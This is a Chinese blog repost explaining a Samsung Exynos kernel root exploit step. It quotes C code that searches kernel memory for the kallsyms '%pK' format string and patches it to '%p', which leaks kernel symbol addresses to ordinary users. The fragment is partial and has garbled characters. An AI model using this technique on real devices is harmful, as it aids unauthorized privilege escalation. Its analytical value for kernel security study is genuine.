针对三星Exynos CPU Root漏洞

最新推荐文章于 2024-09-02 22:14:39 发布
最新推荐文章于 2024-09-02 22:14:39 发布
阅读量109 收藏
点赞数
文章标签: 操作系统 移动开发
原文链接:http://www.cnblogs.com/bittorrent/p/3804109.html
版权

因为系统为了保护这些符号地址泄露,而用的一种保护手段,从而使除root用户外的普通用户不能直接查看符号地址;

原因在于内核文件kallsyms.c中的显示符号地址命令中做了如下限制:

 

  • seq_printf(m, "%pK %c %s\n", (void *)iter->value,
  •                            iter->type, iter->name);

 

只需要把其中的%pK换成%p就可以让普通用户查看符号地址了;很多提权漏洞一般会用到此处的修改来获取符号地址。

源代码:https://android.googlesource.com/kernel/exynos/+/android-exynos-3.4/kernel/kallsyms.c

 search the format string “%pK %c %s\n” in memory
* and replace “%pK” by “%p” to force display kernel
* symbols pointer
*/
for(m = 0; m < length; m += 4) { if(*(unsigned long *)tmp == 0x204b7025 && *(unsigned long *)(tmp+1) == 0×25206325 && *(unsigned long *)(tmp+2) == 0x00000a73 ) { printf(“[*] s_show->seq_printf format string found at: 0x%08X\n”, PAGE_OFFSET + m);
restore_ptr_fmt = tmp;
*(unsigned long*)tmp = 0×20207025;
found = true;
break;
}
tmp++;
}

http://code.woboq.org/linux/linux/kernel/kallsyms.c.html#545

转载于:https://www.cnblogs.com/bittorrent/p/3804109.html

weixin_30436891
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
三星Exynos CPU Root漏洞
移动编程
03-04 174
本文章由Jack_Jia编写,转载请注明出处。文章链接:http://blog.csdn.net/jiazhijun/article/details/8634179作者:Jack_Jia 邮箱:309zhijun@163.com 一、漏洞描述 该漏洞三星Exynos 4210或4412处理器设备上一个重大内核漏洞。黑客利用该漏洞可以轻易获得系统的root权限,进行内核注...
三星的Knox Warranty Bit原理
weixin_30555515的博客
07-27 489
它是如何触发的? 这个值的状态是烧录在主板上,无法刷写修改, 从0到1 不可逆,除非替换硬件 If a non-Knox boot loader or kernel has been installed on the device, Knox can no longer guarantee the security of the Knox container. As a result, the...
利用一个竞态漏洞root三星s8的方法
omnispace的博客
05-29 1423
作者:zjq@IceSword Lab来源:http://www.iceswordlab.com/2018/04/20/samsung-root/在安卓阵营中,三星手机可以说是最重视安全的了,各种mitigation技术都是早于官方系统应用到自己手机上,并且加入了KNOX技术,在内核层设置了重重校验,提高了手机root难度。17年下半年,研究过一段时间三星手机s8的内核安全问题,发现了一些比较有意...
printk %p %px %pK
zqwone的专栏
09-26 2615
printk %p %px %pK。
kptr_restrict 向用户空间内核中的指针(/proc/kallsyms-modules显示value全部为0)
热门推荐
OSKernelLAB(gatieme)
10-22 1万+
CSDN GitHub kptr_restrict 向用户空间内核中的指针(/proc/kallsyms-modules显示value全部为0) LinuxDeviceDrivers/study/debug/filesystem/procfs/kptr_restrict 本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可, 转载请注明出处, 谢谢合作因本人技术
Android Root 漏洞程序包
05-24
8. **exynos-abuse**: 针对三星设备上Exynos处理器的Root工具,因为Exynos芯片组在Android设备中广泛使用,这款工具专门设计来利用这些设备的特定漏洞。 这些工具和程序的使用需要一定的技术知识,不恰当的操作可能...
GalaxySIlI又曝光:防水+2G内存+Exynos四核CPU.pdf
09-24
Exynos是由三星自行研发的高性能移动处理器系列,其四核版本在Galaxy SIII中扮演了核心角色。Exynos 4 Quad(或称为Exynos 4412)采用32nm High-K Metal Gate(HKMG)工艺制造,相比前代产品,它在提高性能的同时...
三星Exynos 4412完整用户手册和FS4412原理图
03-21
三星Exynos 4412是一款高性能的移动处理器,由韩国科技巨头三星电子开发,主要用于智能手机和平板电脑。它是基于ARM Cortex-A9架构的四核处理器,为用户提供强大的计算能力和高效的能源管理。这款处理器在2012年推出...
A8内含20亿颗晶体管 20nm制程略胜三星Exynos 5430
01-19
随着三星(Samsung)在上个月发布Exynos 5430双4处理器,该公司可望成为出货20nm智能手机SoC的供货商。不过,苹果(Apple)近刚发布了iPhone 6与iPhone 6 Plus手机,所搭载的自家A8处理器芯片一样采用了20nm制程,...
exynos8890-bootrom-dump-master_samsung_BootRom_exynos8890_
10-01
关于Exynos 8890处理器,它是三星2015年推出的一款旗舰级移动处理器,采用了14纳米FinFET工艺制造,集成了八核心CPU(四个高性能Mongoose M1核心和四个 Cortex-A53 核心)以及Mali-T880 MP12 GPU。BootROM作为其硬件...
printk(%p的各种方式)
刘末的专栏
06-21 9504
https://www.kernel.org/doc/Documentation/printk-formats.txt If variable is of Type, use printk format specifier: --------------------------------------------------------- int %d or %x unsign
Docker容器技术
LongHongYu908的博客
08-29 1147
Docker之父Docker就好比传统的货运集装箱。
KeePassXC软件简介
最新发布
地球空间
09-02 361
KeePassXC 是一款开源且免费的跨平台密码管理器,它允许用户在不同的网站和服务上使用多个不同的密码,而无需记住它们。KeePassXC 还提供了一个浏览器扩展,允许用户自动从 KeePassXC 中提取用户名和密码,并将其直接填充到网站字段中。- 导入功能:支持从 1Password、KeePass 1 和 CSV 文件导入密码。- 浏览器集成:与多种浏览器集成,自动填充用户名和密码。- 密码生成器:帮助用户创建复杂且安全的密码。- 自动输入:在应用程序中自动输入密码。
虚拟机Linux(Centos7)系统静态IP设置
BQ Blog
08-30 1167
这篇博客介绍了在虚拟机中配置Linux系统的静态IP地址的方法,适用于通过DHCP获取IP地址导致频繁更换IP的情况。首先,用户需要将虚拟机的网络模式更改为NAT模式,并在虚拟机网络编辑器中记录子网IP、子网掩码和网关。然后,编辑相应的网络配置文件,将网络协议更改为静态,并手动设置静态IP地址、子网掩码、网关和DNS。最后,重启网络服务并验证配置是否生效。
操作系统原子操作
zzt_is_me的博客
08-28 8450
所谓的原子操作就是不可被拆分的操作,对于多线程对全局变量进行操作时,就再也不用再线程锁了,和pthread_mutex_t保护作用是一样的,也是线程安全的,有些编译器在使用时需要加-march=i686编译参数。2、type只能是整数相关的类型,浮点型和自定义类型无法使用。功能:把value赋值给*ptr,并返回*ptr的旧值。功能:以上操作返回的是*ptr与value计算后的值。使用原子操作实现一个线程安全的无锁队列。1、该功能并不通用,有些编译器不支持。功能:以上操作返回的是*ptr的旧值。
linux terminal文件查找
xidianhuihui的专栏
08-28 908
以下所有命令仅仅只做常见用法的介绍,不做详细的参数介绍如需详细介绍,可到查阅以下的显示结果均为使用oh-my-zsh的显示结果,如果是使用bash可能略有差异:zsh 默认情况下不支持通配符匹配,需要在~/.zshrc中添加即可。
【亲测有效】linux抓包http协议分析,分析header和body
08-29 191
linux抓包http协议分析,分析header和body
[Meachines] [Medium] SecNotes XSRF跨站请求伪造+SMB-Webshell上传+Linux子系统命令历史记录泄露权限提升
08-29 671
#XSRF跨站请求伪造 #SMB-Webshell上传 #Linux子系统命令历史记录泄露权限提升
subprocess库学习之run(函数)
qq_46396470的博客
09-01 907
是 Python 3.5 及以上版本中的一个函数,用于运行外部命令并等待其完成。该函数是subprocess模块中常用的工具之一,取代了早期的os.system等方法,提供了更强大的功能和更灵活的参数配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值